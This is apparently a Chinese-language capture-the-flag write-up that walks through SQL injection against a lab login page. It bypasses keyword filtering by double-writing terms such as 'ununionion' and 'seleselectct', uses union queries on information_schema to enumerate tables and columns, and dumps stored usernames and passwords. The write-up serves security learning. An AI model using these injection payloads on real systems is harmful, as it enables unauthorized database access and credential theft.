打开页面是一个登录界面,直接用admin’ or 1#试试深浅
回显为:
这里我们分析一下这个报错,near后跟的单引号中的内容为1#' and password='a',那么说明sql语句就是从这里开始语法不正确的,模拟一下正常的sql应该是select * from table where username = 'admin' or 1# password='a'',这样应该是不会报错的,猜测可能是or关键词被过滤了,后面在使用admin' order by 2#这个payload时,报错为right syntax to use near 'der 2#' and password='a'' at line 1更可以验证这一点。
这里我们可以替换or,尝试一下(可以大小写替换,||符号替换,双写替换),这里符号和双写都可以作用,这里先用双写替换绕过,admin' oorr 1#,登录成功
接下来使用union注入手段走流程。先用order by查看列数,admin' oorrder by 2#
这里可以判断order肯定是过了,但是仍然报错,可能是by被过滤了,继续双写,admin' oorrder bbyy 2#,可以登录。最后尝试,得到回显列数为3
admin' union select 1,2,3#找回显列数
可以猜测,select被过滤了,admin' union seleselectct 1,2,3#
union也被过滤了,继续双写,admin' ununionion seleselectct 1,2,3#,这里要把登录名改了,不然会回显正确登录的信息,改为a' ununionion seleselectct 1,2,3#
输入payload:a' ununionion seleselectct 1,database(),group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()#,出现报错
发现where没了,.table之后报错,猜测那之前也有被过滤的关键词,猜测为from,两个都双写,
a' ununionion seleselectct 1,database(),group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#
得到数据库为geek,其下的表有b4bsql,geekuser
继续查看列名先看b4bsql,payload为:
a' ununionion seleselectct 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'#
a' ununionion seleselectct 1,group_concat(username),group_concat(passwoorrd) frfromom b4bsql#
得到flag
